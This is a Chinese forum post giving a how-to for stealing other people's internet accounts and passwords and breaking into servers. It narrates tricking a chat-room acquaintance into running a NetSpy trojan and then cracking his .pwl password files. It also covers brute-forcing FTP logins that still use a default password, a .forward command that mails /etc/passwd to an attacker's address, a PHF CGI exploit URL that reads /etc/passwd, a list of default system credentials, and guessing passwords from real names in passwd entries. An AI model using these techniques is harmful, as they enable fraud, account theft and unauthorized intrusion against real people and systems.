找回密码
 注册

QQ登录

只需一步,快速开始

如何得到别人的上网帐号和密码

[复制链接]
发表于 2011-1-12 21:03:35 | 显示全部楼层 |阅读模式
如何得到别人的上网帐号和密码,我在这里介绍几种弱智方法。( }! t. A6 m* m6 l
方案一:利用特洛伊木马得到帐号。必备工具:NTESPY、PWLVIEW。- V  \1 B# d: w* r: J3 j9 H6 B
优点:只要对方运行了程序就有80%的成功率,而且不需要任何网络入侵知识,只要能熟悉的操作上面两个软件即可。NETSPY是全中文软件,一看就会。而PWLVIEW又是弱智操作只要在DOS下输入PWLVIEW然后按回车即可。成功率高,操作简单而且用不了多长时间是它最大的优点,只是......; p. `& E8 q1 @, p% f
缺点:只有一个,那就是如何让对方乖乖的运行你的程序。
3 L( R6 e9 A0 N3 E* L提示:先问清你的目标和你是不是在一个城市。% c3 k' H0 o( O  T0 V- q- _
实战演戏:一天,我在X海聊天室里寻找目标,遇见了同在北京的色鹅丢丢。我上前打招呼:丢丢好呀。丢丢说:你好呀。我又说:XXXXXXX(客套话,先和他拉关系)对了,我拿到了一个新程序,要不要看看?丢丢说:好呀,寄给我吧。
! q" ~3 p4 ]$ B哈哈,鱼上钩了!先把诱饵程序改个名,如改成readme之类的东东,然后和一些不相干的东西发过去,然后你让他先运行README。在这插一句,有一位大侠使用此法时,竟然把控制端程序和NETSPY的说明文件一起发了过去,真搞不懂他怎么想的。我对他说,你先运行README,是中文说明。丢丢说:好...咦,怎么没反映呀?(YEAH!)我又说:那你直接运行软件吧。丢丢说:好吧...不错...我说:明天见...开始干活,连上他的机子后,现在C盘里找到了WIN95的目录WINDOWS。也有可能是WIN95或WIN98,进入后查找*.pwl,然后把所有后缀名为PWL的文件都抓过来,放在你的工具PWLVIEW的子目录里。在DOS窗口下输入PWLVIEW然后敲回车,丢丢的上网帐号和密码就都显示出来了。而且以后如果他上网,NETSPY就会通知你,他就再也逃不出你的手掌心了。就算是他换了密码,你也能在2分钟内再把他搞定。( Q4 d) M9 U1 Q, g
忠告:你用他的帐号上网后第一件事就是先去查看他的上网时间。分析一下他一般几点上网以避免撞车。5 L% W' ?( P/ M4 n& f
方案二:利用ISP的疏忽做文章举。例用工具:EMAILCRK或网络刺客) L$ x! q) f9 s' H
优点:没什么优点& B7 [- g8 a* T
缺点:要具体情况具体对待,太麻烦
& ~4 B7 U4 L: _提示:平时多多留神。% H$ _+ d  S. D  F4 \+ V
譬如,某个ISP给你开好了帐号,然后又画蛇添足的给你一个邮箱,地址是:你的帐号@xxx.net8 w' A  h( {. o0 h% f
密码和你的上网密码一样。也就是说,只要你能敲开邮箱的密码就一切OK了。
5 v+ l: }  G' M3 _$ B$ l3 j运行EMAILCRK或网络刺客,套上字典后就等着。一般没有XX个小时搞不定,不成功的可能性很大,而且破解时还必须要上网。你的机子要是快可以开上三四个窗口,套上不同的字典一起破
; y: V( E6 d) v0 @方案三:侵入邮局主机然后把PASS档抓回来,然后用JOHN或JACK套上字典开始破。; S) s  T, a5 y: G
优点:一次可以破出好多帐号,而且如果运气好还能拿到ROOT,这个主机就要归你控制了。而且破解时不用上网,可以好几台机子一起破。" g( ]$ h  {% |- Y- m, H. d& B6 O
缺点:对于初学者有一定困难,尤其是只想拿一个上网帐号这样做恐怕会得不偿失。而且被发现的可能性很大,情节严重且性质恶劣,一定要慎重对待。
3 g0 j# Z- s0 i, f- ^2 P" T由于介绍此类的教学文章比较多,我就不班门弄斧了。
1 N  v$ W7 G+ B
& d! p* d" _: c/ z- ^* A+ o7 t哈哈,我来说说最简单的入侵方法。其实入侵大体的原理相同,主要是利用系统的漏洞(BUG)来做文章。
& ~* P. @' L' a; H( e" q# ^& Q只不过有的网站漏洞难找有的好找而已。一个好的黑客,就是要能很快的发现漏洞并加以利用。下面我给大家举一个小栗子。
0 H3 K! o% q  f; G" E  Q% W有一天,我去XX热线申请主页,发现那里采用的是机器自动回信,信的大概格式如下:
  |* }: `$ @: u! W) F, Q! s- Z- z, y7 D+ k9 f8 B+ E+ o
------------------------------  h  R: D. b2 G7 c3 l
# P: K' Q& {# ]/ T
XXX,你好(XX是你在表格上填的名字)
- n' t+ t; A+ n0 `你在XX热线的主页空间已开通5 X! C& H4 K! V$ b% R( i' q
帐户名:XXX 密码:11! R: A3 s; D1 X. j# v# i
-----------XX热线
5 w2 @! {3 n0 W  `电话:XXXX-XXXXXXXX
! ^3 }2 u5 ^7 E9 S' |1 o------------------------------
8 u' o- u0 _8 s1 b. [! n
) L  m  A( y; V$ [  M/ N- Z好了,由于是机器回信,所以那里所有人的初始密码都是11,而且该热线要更改密码要TELNET到邮局主机去改,有许多网友并没有接触过如何T主机,所以他们使用的还是初始密码11。. @7 T' p2 T  w) q3 i, b
开始干活了,打开FTP软件,输入XX热线的IP,密码11,然后挨个输入帐户名。帐户名可去XX热线的主页空间列表里查看,先试试AAAA,。。。没成功,再换一个,AABB。。。还是不行。哈哈,这个用户名短,没准能行。输入AA。。。进去了。寄下用户名然后继续试,ABC。。。又成功了,看来没改密码的人很多呀。试几个就行了,现在,你已经拥有这些帐户的控制权了。2 ?6 Y+ ^1 O; W6 H
上面的这个栗子很简单,一般象这么大的漏很难找。要侵入一个稍微象点话的站台就要耗费你大量的时间和金钱,而且还未必能成功。即使成功了,你不改它实在无趣,改了恐怕会步马X的后尘。此人侵入贵阳的主机并把界面换成了一张淫秽图片。害的自己吃饭不用花钱了。所以我在这里劝大家一句,把这方面的精力放到全心全意为人民服务上去。实在不行就去聊天室,看谁不听话就炸他,同样很过瘾的!% _; E; F6 z2 I. `
  
8 r0 z' z( X9 d  W; l4 e0 _
. z2 B% e% y8 x: a1 Y$ x                           如何获得第一个帐号# j8 {2 q1 n6 A0 C2 L2 P& z* }* W  `

6 U* Y% ]* }; _# B' K, a& x我们这种水平不高的黑客入侵都是先得到系统的一个有效帐号,进入后再利用系统BUG得到ROOT权限或想办法得到SHADOW再解密.无论是利用系统漏洞还是得到SHADOW都是有一定规律可寻的,通常你到一些黑客站点找到对应系统相应版本的EXPLOIT编译后执行就行了.我感觉最困难的是获得第一个有效的帐号,有时侯费尽力气也得不到,后来总算是积累了一些经验,想写出来和大家交流一下,希望能抛砖引玉,请高手们把更好的方法告诉我.
" @1 f/ R4 s9 C' |1 T# d) F8 u. u! c/ @9 `% `. R' p
确定了目标以后,我通常是先用匿名FTP去看一下,许多网站都开匿名FTP,帐号用ANONYMOUS或是FTP,密码用一个EMAIL帐号(当然是假的),进入后到/etc目录下把PASSWD拿回来,一般情况下都是一份很不全的名单,只有几个系统帐号,那就算白来了:-}但有的时候会有比较傻的管理员把一些普通帐号放进去,这就是很重要的信息,虽然只有帐号没有密码,但毕竟迈出了第一步.如果FTP主目录是drwxr-xr-x,做一个.foward文件传上去,在UNIX下的命令应该是echo"| /bin/cat /etc/passwd|sed 's/^/ /'|/bin/mail me@my.e-mail.addr" > .forward然后给匿名用户写一封信,它会把PASSWD发给你。
4 d. D! F. ?/ U3 d7 R
- O1 g8 @! j; @7 W; U4 }如果目标没有匿名FTP,就通过WWW访问它的主页,看看上面有什么信息,例如通过一些联系人的EMAIL你就可以发现一些帐号,有的网页上甚至列出了EMAIL通讯录,这对黑客来讲就是无价之宝.把这些帐号记下来,非常有用.8 ?+ R' A& u* k4 R
" W3 W4 ^7 t6 A4 v$ ^. t; t5 _9 a
以上几个方法都不行的话,那就试试PHF查询.在浏览器的地址栏输入http://攻击目标/cgi-bin/phf/?Qalias=x%0acat%20/etc/passwd如果成功的话会显示出PASSWD来,但是成功率极低:-<
7 r# I. l- _" y7 Z( I" ?4 D; `2 a
0 c' g1 V2 Z" w) p3 K' H5 p还可以利用目标的FINGER功能来积累帐号,如利用HAKTEK(一种扫描器)来监视目标,一旦有人登陆该主机就会报告给你.但这种方法的缺点就是浪费时间,如果你是自己花钱上网的话可就要出血了!
8 d2 ]0 J: }; y! c+ i, l$ D9 f- k8 C4 Q9 z2 n8 D
很有可能以上的方法都不行,那只好使出我的看家本事了-------猜!!!有一些系统默认的帐号,例如:8 j) J4 l: j+ K2 G1 t# e6 Z+ E
4 j# n8 y" m, H
帐号     密码
8 _3 d1 A: j( R( O; O* `4 r6 q----------- ----------------
+ ^( W& }9 z: a6 M: Y- xroot    root. m2 `$ @5 {! [+ ]
sys     sys/system/bin4 h0 G1 R- ]- j
bin     sys/bin
) ?. x6 W. [1 V, `) {/ Z. [# C0 }mountfsys  mountfsys% M1 v- Z3 t( J. j% N8 {
adm     adm
, l; Z( v1 ?6 G5 t4 muucp    uucp9 R5 I" v5 b, E' @
nuucp    anon
" G2 R* ?4 y/ F% k" L* a1 hanon    anon
% `3 n# Z6 a; d, S: Euser    user
; J% e' F- J0 E! |1 E4 fgames    games, J  f2 N9 a9 m4 I) n$ l$ t3 i
install   install
6 f7 c) m0 O, `$ t; j5 V+ H- Sreboot   给 "command login" 用的2 f3 B; y7 W. N; Y; V$ L
demo    demo
+ Q% J+ A9 ?! u, v" H& n% cumountfsys umountfsys# `7 D, G: s1 q
sync     sync6 E# P+ `% p8 p# P  n1 j" j
admin    admin
3 p& l- p# @& V5 Q5 D7 K2 ^guest    guest
9 A( z" l  K. k3 ?: |daemon   daemon/ w4 Z* k- ?6 e( I1 U
________________________________________________________________
7 @  v7 Q' U+ Y5 F; ?1 F
* H7 r) `0 k9 u, Y: A有些管理员忘记把他们改掉,那你就发财了!' ^* ^  o2 r  G% w
4 ?: S) q2 K/ Z# j* d$ s, n3 V1 `# s
另外还有一些习惯性帐号如:test,www,html,web,oracle,setup,sybase,john,tom等也都应该试一试.
& H$ g6 h- m! V  j6 |
& z5 Z, Q" Y9 O: V只有帐号还不能进入系统,但有了帐号搞密码就容易一些了,主要办法还是猜.如果是通过PASSWD知道帐号的那你应该会发现该用户的许多信息,例如:
5 r# \& A3 D, _- E4 r$ \; u# ^. |+ y: G; N: N2 c) a8 L
.........
" Z0 n7 v; p0 b! J
3 q! p2 h# ~! R3 dxlguo:x:263:50:Guo xiaolin:/usr/xlguo:/bin/sh
3 [0 X  \1 O2 k2 |% x) z. d
* i! a& S" {1 m% N5 Mqingyuan:x:275:50::/usr/qingyuan:/bin/sh
5 h& D* s2 W8 w% \& E  k+ A$ Q8 U( \: e6 l) {1 d" E  ?. z
hjhuang:x:278:50:Huang Haijun:/usr/hjhuang:/bin/sh( |0 n/ ?5 `( e+ q

; N8 d/ d  T! R/ E6 [; Tsmlian:x:282:50:Mr. Lan Shumin:/usr/smlian:/bin/sh
* D4 k; z: X5 _7 z5 e6 q6 |5 c, `! V
kyc:x:293:50:Department of Science & Technology:/usr/kyc:/bin/sh4 M1 K& z: y0 l, \$ |3 c2 x1 {
9 l( F3 Q4 a- M" y+ l$ d4 M
brlu:x:300:50:Lu Baoren:/usr/brlu:/bin/sh
' ~: \8 X' F8 b: K4 c' z" B  U* y/ O
tide:x:301:50:Wang XinYi:/usr/tide:/bin/sh
# s6 G5 Q* Y6 \' a) i* S5 Z
& z8 y/ J2 o( J% c# C! @" k3 U; \8 z0 X............4 ?0 t" f+ a2 ^3 \4 K- S% F
) {+ K% V# v) _: L) t, z
这是一部分PASSWD,从这儿我们可以得到七个帐号,注意每一行的第五项,那是该用户的真实姓名,对!就用它来做密码试.成功率还是比较高的.) ]! M9 j- m2 T) {/ \3 o1 n  V; H0 K

  L2 @: T/ o: G) K如果是用其他方法获得帐号的,就用FINGER查询来获得相关信息.例如知道一个帐号support,我们就用网络刺客II里的FINGER项来侦察support@xxx.xxx.xxx会获得很多该帐号的信息例如真名实姓,电话号码等就用这些做密码来猜">如果是用其他方法获得帐号的,就用FINGER查询来获得相关信息.例如知道一个帐号support,我们就用网络刺客II里的FINGER项来侦察support@xxx.xxx.xxx会获得很多该帐号的信息例如真名实姓,电话号码等就用这些做密码来猜.( J# V. L, e1 c; d4 E' ~

" r5 r+ u9 a- z6 n7 k  ~( X7 Z当然最可能的密码还是帐号本身和一些帐号的变形,如帐号是john,密码可能是nhoj,john123,john888等.或是一些简单数字.总之是要费一番工夫来猜的.. [% s) N" h4 w/ d3 @# W

( Y# A; H0 L1 Y% x( t( g( y  w如果还猜不出密码,只好用LETMEIN之类的东西来猜,字典一定要好.否则,你的电话费就要.....而且这种方法比较危险,还是不用为好.1 D1 b0 Z) B0 d6 A: w
. {! z0 |9 i/ ~& }! d; q
最后实在不行还有一种比较卑劣的手段,就是给该网站的网管写封信,想办法骗他执行特洛伊木马,然后再.......算了,不说了.
% D, R( ~8 b$ t+ {5 [+ [5 _. t) l! g1 Y& l
你可能发现以上这些方法都不能百分之百的成功,或者说成功率是比较低的,因为我也不知道更好的方法.但我感到一定有一种更好的方法,希望有高手见到此文能告诉我., J5 w, a7 x: x+ ]+ l

3 N0 k8 W# J. o
您需要登录后才可以回帖 登录 | 注册

本版积分规则

QQ|本地广告联系: QQ:905790666 TEL:13176190456|Archiver|手机版|小黑屋|汶上信息港 ( 鲁ICP备19052200号-1 )

GMT+8, 2026-4-30 19:00

Powered by Discuz! X5.0

© 2001-2026 Discuz! Team.

快速回复 返回顶部 返回列表